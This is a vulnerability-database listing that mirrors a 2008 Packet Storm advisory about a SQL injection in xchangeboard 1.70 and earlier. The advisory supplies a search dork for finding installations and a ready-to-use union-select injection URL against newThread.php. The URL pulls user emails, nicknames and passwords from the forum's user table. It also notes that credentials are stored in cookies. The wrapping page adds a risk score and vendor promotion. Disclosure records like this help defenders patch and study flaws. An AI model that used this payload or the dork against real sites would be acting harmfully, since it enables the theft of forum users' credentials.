Lucene search

xchangeboard-sql.txt

🗓️ 10 Jul 2008 00:00:00Reported by haZl0ohType

packetstorm🔗 packetstormsecurity.com👁 16 Views

xchangeboard 1.70 final and lower, Bug by - haZl0oh, Dork - "Powered by xchangeboard", Credentials saved as cookies, PoC - path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user, Greetz to h0yt3r, everiZzel & Mastermaefj

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`######################  
#  
# xchangeboard 1.70 final and lower  
#  
#  
######################  
#  
#Bug by: haZl0oh #  
#Dork: "Powered by xchangeboard"  
#info:you have to be an registered user to use it like this !!!!  
#there should be a lot more vulns there ;)  
#  
#  
#  
# credentials like passwords are saved as cookies .... :D  
##  
###  
##  
#  
#PoC:  
#http://site.com/path/newThread.php?boardID=+999999%20union%20select%20email,concat_ws(0x3a,nick,substring(password,1,100)),email,email,email%20from%20user/*  
#  
# #  
#  
#  
#######################  
#  
#Greetz to h0yt3r ,everiZzel & Mastermaefju  
#  
#######################  
#######################  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

10 Jul 2008 00:00Current

7.4High risk

Vulners AI Score7.4